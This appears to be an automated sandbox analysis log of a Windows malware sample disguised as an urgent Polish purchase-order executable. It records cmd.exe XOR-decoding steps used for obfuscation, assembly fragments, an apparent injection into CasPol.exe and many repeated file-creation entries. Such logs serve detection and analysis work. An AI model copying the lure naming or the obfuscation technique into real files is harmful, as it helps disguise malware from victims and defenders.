            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_10002D20 push eax; ret
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_05707755 push ebx; iretd
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_057061B8 push es; retf
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_05706EEE push ds; retf
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_057064C9 pushfd ; iretd
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_057048AC push FFFFFF8Ah; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 137_3_00BA5DE0 push 1000BA25h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 137_3_00BA5DE0 push 1000BA25h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 137_3_00BA5DE0 push 1000BA25h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 137_3_00BA5DE0 push 1000BA25h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 137_3_00BA5DE0 push 1000BA25h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 137_3_00BA5DE0 push 1000BA25h; ret
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: \pilne zamowienie nr5363582 utech maszyny i urzadzenia techniczne jaroslaw koenig sp. k..exe
